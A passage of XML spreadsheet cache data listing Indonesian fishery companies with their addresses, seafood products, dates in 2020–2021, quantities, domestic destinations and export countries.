    <s v="Jl. Daeng Salili No.17A RT 01 RW 01, Kel. Kampung Bugis, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-cumi, Gurita)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="2070"/>
    <s v="Kabupaten Karimun, Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21959"/>
    <x v="603"/>
    <s v="PT. HARMONI SAMUDRA PERKASA"/>
    <s v="Jl. Daeng Salili No.17A RT 01 RW 01, Kel. Kampung Bugis, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Gulama, Lencam, Sebelah, Manyung)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Karimun, Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21960"/>
    <x v="603"/>
    <s v="PT. HARMONI SAMUDRA PERKASA"/>
    <s v="Jl. Daeng Salili No.17A RT 01 RW 01, Kel. Kampung Bugis, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Gulama, Lencam, Sebelah, Manyung)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="64500"/>
    <s v="Kabupaten Karimun, Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21961"/>
    <x v="603"/>
    <s v="PT. HARMONI SAMUDRA PERKASA"/>
    <s v="Jl. Daeng Salili No.17A RT 01 RW 01, Kel. Kampung Bugis, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Lemuru, Mata Besar, Tongkol, Julung-Julung, Kembung)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="494019"/>
    <s v="Kabupaten Karimun, Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21962"/>
    <x v="603"/>
    <s v="PT. HARMONI SAMUDRA PERKASA"/>
    <s v="Jl. Daeng Salili No.17A RT 01 RW 01, Kel. Kampung Bugis, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Lemuru, Mata Besar, Tongkol, Julung-Julung, Kembung)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="211723"/>
    <s v="Kabupaten Karimun, Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21963"/>
    <x v="586"/>
    <s v="CV. ADI JAYA MANDIRI"/>
    <s v="Blok Sirawa RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21964"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ginseng Laut"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Korea, Republic of"/>
  </r>
  <r>
    <n v="21965"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-cumi, Gurita)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Chile, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21966"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21967"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Lemuru, Tongkol, Sarden, Tenggiri)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Chile, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21968"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Barramundi, Kerapu, Kakatua, Kakap, Kurisi)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21969"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21970"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21971"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ubur-Ubur Kering"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21972"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cacing Laut Kering"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21973"/>
    <x v="604"/>
    <s v="KOPERASI BERKAH SAMUDERA KENDARI"/>
    <s v="Jl, Tuna Kompleks Pelabuhan Perikanan Samudera (PPS) Kendari, Kel, Puday, Kec, Poasia, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Layang)"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21974"/>
    <x v="604"/>
    <s v="KOPERASI BERKAH SAMUDERA KENDARI"/>
    <s v="Jl, Tuna Kompleks Pelabuhan Perikanan Samudera (PPS) Kendari, Kel, Puday, Kec, Poasia, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Bandeng Beku"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21975"/>
    <x v="605"/>
    <s v="CV. MOMAR BIRU SEJAHTERA"/>
    <s v="Jl. Poros Lasalimu, Kel. Wakoko, Kec. Pasar Wajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang)"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21976"/>
    <x v="606"/>
    <s v="PT. SARI CAKALANG"/>
    <s v="Madidir Weru Lingkungan IV, Kel. Madidir Weru, Kec. Bitung Tengah, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="20710"/>
    <s v="Kota Tangerang, Kota Denpasar, Kota Makassar"/>
    <s v="Japan, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21977"/>
    <x v="607"/>
    <s v="CV. CAHAYA SEJAHTERA"/>
    <s v="Jl. P. Nusa Barung Komp Niaga Malindo No.3A KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21978"/>
    <x v="608"/>
    <s v="PT. MITRA TIMUR RAYATAMA"/>
    <s v="Jl. Noari Pelabuhan Perikanan Nusantara Merauke, Kel. Karang Indah, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Demersal Beku (Kakap, Mata Besar, Kuro)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21979"/>
    <x v="608"/>
    <s v="PT. MITRA TIMUR RAYATAMA"/>
    <s v="Jl. Noari Pelabuhan Perikanan Nusantara Merauke, Kel. Karang Indah, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Air Tawar Beku (Mujair, Otek, Gabus)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21980"/>
    <x v="609"/>
    <s v="UD. CATHAY INDO CHITIN"/>
    <s v="Dusun Krajan 1 RT 03 RW 05, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Chitin, Chitosan"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Surabaya"/>
    <s v="Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="21981"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Hidup"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="36000"/>
    <s v="Kabupaten Rokan Hilir"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21982"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Beku"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="5400"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21983"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Siput Hidup"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="48000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21984"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Siput Beku"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="7200"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21985"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Air Tawar Segar (Lele, Mas, Gurami, Patin, Nila)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="48000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21986"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Air Tawar Hidup"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="48000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21987"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Air Tawar Beku (Lele, Mas, Gurami, Patin, Nila)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="7200"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21988"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="240000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21989"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Beku"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="24000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21990"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Beku (Senangin)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="540"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21991"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Senangin)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="3600"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21992"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="1800"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21993"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="270"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21994"/>
    <x v="610"/>
    <s v="PT. MEGA RIAU AQUATIK"/>
    <s v="Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="1800"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21995"/>
    <x v="611"/>
    <s v="PT. NELAYAN MINA LESTARI"/>
    <s v="Jl. Hang Tuah No.79, Kel. Bajomulyo, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Barakuda, Tongkol, Layang, Tenggiri)"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="21996"/>
    <x v="611"/>
    <s v="PT. NELAYAN MINA LESTARI"/>
    <s v="Jl. Hang Tuah No.79, Kel. Bajomulyo, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Jahan, Manyung, Benggol)"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="21997"/>
    <x v="611"/>
    <s v="PT. NELAYAN MINA LESTARI"/>
    <s v="Jl. Hang Tuah No.79, Kel. Bajomulyo, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat, Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="21998"/>
    <x v="612"/>
    <s v="CV. INDOTAMAS ASAHAN"/>
    <s v="Jl. Tenggiri No.11, Kel. Bagan Asahan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Malaysia, Thailand"/>
  </r>
  <r>
    <n v="21999"/>
    <x v="612"/>
    <s v="CV. INDOTAMAS ASAHAN"/>
    <s v="Jl. Tenggiri No.11, Kel. Bagan Asahan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Kering"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22000"/>
    <x v="613"/>
    <s v="CV. LAUT BEROMBANG LESTARI"/>
    <s v="Jl. Ahmad Yani No.27, Kel. Sei Berombang, Kec. Panai Hilir, Kabupaten Labuhan Batu&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22001"/>
    <x v="613"/>
    <s v="CV. LAUT BEROMBANG LESTARI"/>
    <s v="Jl. Ahmad Yani No.27, Kel. Sei Berombang, Kec. Panai Hilir, Kabupaten Labuhan Batu&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Teri Kering"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22019"/>
    <x v="614"/>
    <s v="ANGGUN"/>
    <s v="Dusun Lekok Timur, Kel. Gondang, Kec. Gangga, Kabupaten Lombok Utara&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pindang"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="7704"/>
    <s v="Kabupaten Lombok Utara"/>
    <m/>
  </r>
  <r>
    <n v="22020"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="22021"/>
    <x v="173"/>
    <s v="PT. DYTONA DELI KRISP"/>
    <s v="Jl. Mutiara III, Kel. Curug, Kec. Gunung Sindur, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerupuk Ikan, Kerupuk Udang"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="350000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bogor"/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22031"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Lemadang, Meka, Marlin, Deho, Kembung, Makerel, Malalugis, Sarden, Cakalang, Tenggiri)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="350000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Bitung"/>
    <s v="C√¥te d'Ivoire, Ecuador, Japan, Panama, Sri Lanka, Suriname, Thailand"/>
  </r>
  <r>
    <n v="22033"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Amberjack, Hamachi, Seabass, Alaska Pollack, Butterfish, Pufferfish)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22034"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22035"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Bulu Babi Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22036"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22037"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22038"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Salmon Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22040"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22042"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demesal Beku (Kakap, Hirame, Founder, Kimnedai, Monkfish, Mutsu, Kinki, Cod)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="7000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22043"/>
    <x v="615"/>
    <s v="PT. LANCAR SUKSES INFINITI"/>
    <s v="Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="8000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22045"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Masak Kupas"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Germany, Netherlands"/>
  </r>
  <r>
    <n v="22046"/>
    <x v="616"/>
    <s v="UD. PUTRA ANELA MANDIRI"/>
